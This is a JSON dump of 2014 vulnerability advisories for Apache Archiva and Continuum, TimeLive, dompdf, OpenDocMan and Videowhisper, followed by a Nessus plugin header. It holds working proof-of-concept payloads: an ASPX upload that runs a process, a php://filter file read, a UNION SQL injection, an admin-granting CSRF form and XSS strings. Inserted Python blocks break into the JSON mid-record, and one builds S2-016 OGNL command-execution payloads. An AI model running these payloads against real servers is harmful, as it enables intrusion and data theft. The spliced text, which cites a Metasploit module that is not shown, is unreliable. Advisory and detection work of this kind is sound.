"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2251: Apache Archiva Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nApache Archiva is affected by a vulnerability in the version of the Struts library being used, which allows a malicious user to run code on the server remotely. 
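Both this Archiva advisory and the struts_default_action_mapper.rb Metasploit module reproduced earlier on this page rest on the same S2-016 behaviour: DefaultActionMapper strips the redirect: prefix and evaluates what follows as OGNL. The following Python is an added example, not part of the advisory or of the Metasploit module; it rebuilds the probe and command payloads the module sends, classifies the target from the 302 Location header the way the module does, and runs a detection regex over constructed access-log lines (the log lines, addresses and paths are made up for this example).

```python
import re

BS = chr(92)   # a single backslash, built at runtime
Q = chr(39)    # a single quote, for OGNL string literals

def jstr(s):
    # OGNL/Java string literal; the inputs used here contain no quotes
    return Q + s + Q

def ognl_path(path):
    # A raw slash does not survive inside the redirect: location, so the module
    # sends the path with $ in place of / and lets Java put the slash back through
    # the unicode escape sequence u002f when the expression is evaluated.
    return ('new java.lang.String(' + jstr(path.replace('/', '$')) +
            ').replace(' + jstr('$') + ',' + jstr(BS + 'u002f') + ')')

def query_string(expr):
    # ?redirect:%25{ ... } : after one URL decode the mapper sees redirect:%{ ... }
    # and evaluates the braces as OGNL (S2-016). Spaces go out as %20 like the module.
    return '?redirect:%25{' + expr.replace(' ', '%20') + '}'

def fingerprint_probe(proof):
    # The probe the module uses for target autodetection: canonical path of the
    # working directory with a random marker appended, echoed back via Location.
    return query_string('new java.io.File(' + jstr('.') + ').getCanonicalPath().concat(' + jstr(proof) + ')')

def exec_probe(argv):
    # ProcessBuilder with a String[] argument list; arguments containing a slash
    # go through ognl_path, the rest are plain literals.
    parts = [ognl_path(a) if '/' in a else jstr(a) for a in argv]
    return query_string('(new java.lang.ProcessBuilder(new java.lang.String[]{' + ','.join(parts) + '})).start()')

def os_from_redirect(status, location, proof):
    # A 302 whose Location carries the marker proves the expression ran; a drive
    # letter followed by a backslash means Windows, anything else is taken as Linux.
    if status != 302 or not location or proof not in location:
        return None
    return 'windows' if (':' + BS) in location else 'linux'

# Constructed access-log lines (not real traffic) for the detection check below.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/May/2014:10:01:02 +0000] GET /archiva/index.action HTTP/1.1 200 5123',
    '10.0.0.9 - - [04/May/2014:10:01:07 +0000] GET /archiva/index.action?redirect:%25{new%20java.io.File(%27.%27).getCanonicalPath()} HTTP/1.1 302 0',
    '10.0.0.9 - - [04/May/2014:10:01:09 +0000] GET /archiva/index.action?redirectAction:%25%7B(new+java.lang.ProcessBuilder(...)).start()%7D HTTP/1.1 302 0',
    '10.0.0.5 - - [04/May/2014:10:01:12 +0000] GET /archiva/index.action?redirect:/home HTTP/1.1 302 0',
]

_S2016 = re.compile('(redirect|redirectAction):(%25|%)?(%7B|[{])', re.IGNORECASE)

def find_s2016(lines):
    # Flag a redirect:/redirectAction: prefix followed by an OGNL brace, whether the
    # brace arrives raw, once-encoded (%7B) or with the percent sign itself encoded.
    # A plain redirect:/path (the legitimate use of the prefix) is left alone.
    return [i for i, line in enumerate(lines) if _S2016.search(line)]
```

The 302 with the marker in Location is also the cheapest non-destructive check for an unpatched instance: it proves evaluation without running a process.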
More details about the vulnerability can be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30568", "title": "[SECURITY] CVE-2013-2251: Apache Archiva Remote Command Execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the "My Projects".."Manage Project" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n"Read and Execute".\r\n\r\n1. Using any text editor create a new file "run-cacl.aspx" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language="VB" %>\r\n <%\r\n System.Diagnostics.Process.Start("calc.exe")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click "My Projects" from the left-hand menu\r\n4. Click the "Manage" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click "Attachment"\r\n6. Click "Browse" and navigate to where you saved "run-cacl.aspx"\r\n7. Click "Upload"\r\n8. Logout of TimeLive [Optional]\r\n9. 
On the server hosting the TimeLive application run "TaskMgr"\r\n10. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n11. Observe "calc.exe" running as "NETWORK_SERVICE" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the "1/1" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. 
In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30561", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30561", "title": "CVE-2014-2042 - Unrestricted file upload in Livetecs Timelive", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nA request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Archiva home page.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30567", "title": "[SECURITY] CVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Arbitrary file read in dompdf\r\nCVE: CVE-2014-2383\r\nVendor: dompdf\r\nProduct: dompdf\r\nAffected version: v0.6.0\r\nFixed 
version: v0.6.1 (partial fix)\r\nReported by: Alejo Murillo Moyas\r\n\r\nDetails:\r\nAn arbitrary file read vulnerability is present on dompdf.php file that\r\nallows remote or local attackers to read local files using a special\r\ncrafted argument. This vulnerability requires the configuration flag\r\nDOMPDF_ENABLE_PHP to be enabled (which is disabled by default).\r\n\r\nUsing PHP protocol and wrappers it is possible to bypass the dompdf's\r\n"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing\r\nsystem files or other files on the webserver. Please note that the flag\r\nDOMPDF_ENABLE_REMOTE needs to be enabled.\r\n\r\nCommand line interface:\r\nphp dompdf.php\r\nphp://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n\r\nWeb interface:\r\n \r\nhttp://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. 
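Why the php://filter input defeats a chroot-style check, as an added example in Python rather than dompdf's own PHP: the advisory says the bypass needs DOMPDF_ENABLE_REMOTE, which means inputs carrying a scheme are treated as remote documents and skip the chroot comparison, while PHP's stream layer then opens php:// locally. naive_check models that logic and hardened_check the corrected one. This is not dompdf's code; the chroot directory, the stand-in for realpath() and the exact shape of the check are assumptions made for this example.

```python
import posixpath
import re

CHROOT = '/var/www/dompdf'   # assumed DOMPDF_CHROOT value for the example

_SCHEME = re.compile('^([a-z][a-z0-9+.-]*)://', re.IGNORECASE)

def _fake_realpath(path):
    # Stand-in for PHP realpath(): canonicalises absolute plain paths and yields
    # None (PHP would return false) for anything that is not a filesystem path.
    if not path.startswith('/'):
        return None
    return posixpath.normpath(path)

def naive_check(input_file, enable_remote):
    # Anything with a scheme is treated as a remote document and skips the chroot
    # test whenever remote loading is enabled. php:// has a scheme too, and PHP
    # opens it locally, so the chroot never sees the target file.
    if _SCHEME.match(input_file):
        return input_file if enable_remote else None
    resolved = _fake_realpath(input_file)
    if resolved is None or posixpath.commonpath([CHROOT, resolved]) != CHROOT:
        return None
    return resolved

def hardened_check(input_file, enable_remote):
    # Only http and https count as remote; every other scheme is refused outright,
    # and a local input still has to resolve under the chroot.
    m = _SCHEME.match(input_file)
    if m:
        scheme = m.group(1).lower()
        return input_file if (enable_remote and scheme in ('http', 'https')) else None
    resolved = _fake_realpath(input_file)
    if resolved is None or posixpath.commonpath([CHROOT, resolved]) != CHROOT:
        return None
    return resolved

def filter_payload(path):
    # The wrapper from the advisory: base64-encode the target through the convert
    # filter so binary or markup content survives being rendered into the PDF.
    return 'php://filter/read=convert.base64-encode/resource=' + path
```

The same allow-list-of-schemes rule is what keeps data://, phar:// and compress.zlib:// out as well, which a deny-list of php:// alone would miss.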
In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30563", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30563", "title": "CVE-2014-2383 - Arbitrary file read in dompdf", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering "timelive default credentials"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. 
It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30562", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30562", "title": "CVE-2014-1217 - Unauthenticated access to sensitive information and functionality in Livetecs Timelive", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper\r\nCVE: CVE-2014-2715\r\nVendor: VideoWhisper\r\nProduct: Videowhisper module for Drupal 7\r\nAffected version: 7\r\nFixed version: \r\nReported by: Mahmoud Ghorbanzadeh\r\n\r\nDetails:\r\n\r\nHello,\r\nI found Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). 
The vulnerability exists at line 2 and line 4 in drupal\modules\videowhisper\vwrooms\templates\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\modules\videowhisper\vwrooms\vwrooms.module.\r\n\r\nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script>\r\n\r\nVendor Notification: 18 Apr 2014\r\n \r\nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.\r\n\r\nBest Regards.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30559", "title": "[CVE-2014-2715] Cross-site scripting (XSS) vulnerability in Videowhisper", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2251: Apache Continuum affected by Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Continuum 1.3.1 to Continuum 1.4.1\r\n\r\nDescription:\r\nApache Continuum is affected by a vulnerability in the version of the Struts library being used,\r\nwhich allows a malicious user to run code on the server remotely. 
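The Struts flaw behind this Continuum advisory (S2-016, CVE-2013-2251) is exploitable from a single GET request because the vulnerable DefaultActionMapper evaluated OGNL carried in parameter names that begin with the 'action:', 'redirect:' or 'redirectAction:' prefix. The Python below is an added detection example written for this page, not code from Apache, Tenable or any advisory reproduced here: it URL-decodes every query-string chunk of a request line and flags a chunk that starts with one of those prefixes and then opens an OGNL expression. The request lines it runs over are constructed; the first three mirror the probe shapes used by the Nessus check reproduced further down this page, including the arithmetic canary whose sum 73594709 that check looks for in the Location header.

```python
from urllib.parse import unquote_plus, urlsplit

# Parameter-name prefixes that the Struts 2 DefaultActionMapper evaluated as
# OGNL before 2.3.15.1 (the S2-016 advisory referenced above). Compared in
# lower case so that 'redirectAction:' and 'RedirectAction:' both match.
OGNL_PREFIXES = ('action:', 'redirect:', 'redirectaction:')

# Tokens that open an OGNL expression. '%{' is listed as well because a
# single URL-decode of the common double-encoded '%25{' probe yields it.
OGNL_MARKERS = ('${', '%{')


def find_ognl_injection(request_line):
    '''Return details of an S2-016-style probe found in one HTTP request
    line (METHOD PATH VERSION), or None if the request carries none.

    The expression lives in the parameter name, usually with no '=' at all,
    so each '&'-separated query chunk is inspected as a whole.'''
    parts = request_line.split(' ')
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    for chunk in target.query.split('&'):
        decoded = unquote_plus(chunk)
        lowered = decoded.lower()
        for prefix in OGNL_PREFIXES:
            if not lowered.startswith(prefix):
                continue
            expression = decoded[len(prefix):]
            # A prefix alone is not evidence: Struts apps used
            # 'redirectAction:' legitimately. Require an OGNL opener.
            if any(marker in expression for marker in OGNL_MARKERS):
                return {
                    'path': target.path,
                    'prefix': decoded[:len(prefix)],
                    'expression': expression,
                }
    return None


def scan_request_lines(lines):
    '''Run the detector over an iterable of request lines; returns the hits.'''
    hits = []
    for line in lines:
        hit = find_ognl_injection(line)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample traffic (not taken from any real scan or log).
# Requests 1-3 follow the three probe styles of the Nessus plugin shown
# later on this page: the 'action:' ProcessBuilder form, the 'redirect:'
# form that reads the servlet context, and the arithmetic canary
# ${57550614+16044095}. Requests 4 and 5 are benign and must not fire.
SAMPLE_REQUESTS = [
    'GET /continuum/index.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27id%27})).start()} HTTP/1.1',
    'GET /archiva/index.action?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)} HTTP/1.1',
    'GET /archiva/index.action?redirect:%24%7B57550614%2b16044095%7D HTTP/1.1',
    'GET /archiva/index.action?action=browse&redirect=home HTTP/1.1',
    'GET /continuum/projectView.action?redirectAction:viewProject&projectId=12 HTTP/1.1',
]

if __name__ == '__main__':
    for hit in scan_request_lines(SAMPLE_REQUESTS):
        print(hit['path'], hit['prefix'], hit['expression'])
```

Decoding before matching is the point of the example: the first sample only becomes recognisable as OGNL after '%25{' turns into '%{', and the third only after '%24%7B' turns into '${'. The fifth sample shows why the prefix by itself must not be treated as an attack.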
More details about the vulnerability\r\ncan be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Continuum 1.4.2, which is not affected\r\nby this issue.\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n\r\n", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30825", "title": "[SECURITY] CVE-2013-2251: Apache Continuum affected by Remote Command Execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23202\r\nProduct: OpenDocMan\r\nVendor: Free Document Management Software\r\nVulnerable Version(s): 1.2.7 and probably prior\r\nTested Version: 1.2.7\r\nAdvisory Publication: February 12, 2014 [without technical details]\r\nVendor Notification: February 12, 2014 \r\nVendor Patch: February 24, 2014 \r\nPublic Disclosure: March 5, 2014 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]\r\nCVE References: CVE-2014-1945, CVE-2014-1946\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.\r\n\r\n\r\n1) SQL Injection in OpenDocMan: CVE-2014-1945\r\n\r\nThe vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in 
"/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below displays version of the MySQL server:\r\n\r\nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9\r\n\r\n\r\n2) Improper Access Control in OpenDocMan: CVE-2014-1946\r\n\r\nThe vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.\r\n\r\nThe exploitation example below assigns administrative privileges for the current account:\r\n\r\n<form action="http://[host]/signup.php" method="post" name="main">\r\n<input type="hidden" name="updateuser" value="1">\r\n<input type="hidden" name="admin" value="1">\r\n<input type="hidden" name="id" value="[USER_ID]">\r\n<input type="submit" name="login" value="Run">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to OpenDocMan v1.2.7.2\r\n\r\nMore Information:\r\nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/\r\nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.\r\n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30587", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30587", "title": "Multiple Vulnerabilities in OpenDocMan", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "wpvulndb": [{"lastseen": "2018-09-17T19:26:06", "bulletinFamily": "software", "description": "WordPress Vulnerability - XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF\n", "modified": "2017-01-03T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:7154", "href": "https://wpvulndb.com/vulnerabilities/7154", "type": "wpvulndb", "title": "XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-17T19:27:04", "bulletinFamily": "software", "description": "WordPress Vulnerability - VideoWhisper Live Streaming Integration 4.27.3 - Multiple Vulnerabilities\n", "modified": "2015-05-15T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6175", "href": "https://wpvulndb.com/vulnerabilities/6175", "type": "wpvulndb", "title": "VideoWhisper Live Streaming Integration 4.27.3 
- Multiple Vulnerabilities", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:26:56", "bulletinFamily": "software", "description": "WordPress Vulnerability - AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection\n", "modified": "2015-05-15T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6597", "href": "https://wpvulndb.com/vulnerabilities/6597", "type": "wpvulndb", "title": "AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:18:19", "bulletinFamily": "scanner", "description": "According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)", "modified": "2018-06-14T00:00:00", "published": "2014-04-29T00:00:00", "id": "ARCHIVA_1_3_8.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73761", "title": "Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73761);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2013-2187\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 66991, 66998);\n script_xref(name:\"EDB-ID\", 
value:\"27135\");\n\n script_name(english:\"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Archiva version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/security.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://commons.apache.org/proper/commons-ognl/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 
DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/archiva\");\n script_require_ports(\"Services/www\", 8080);\n\n 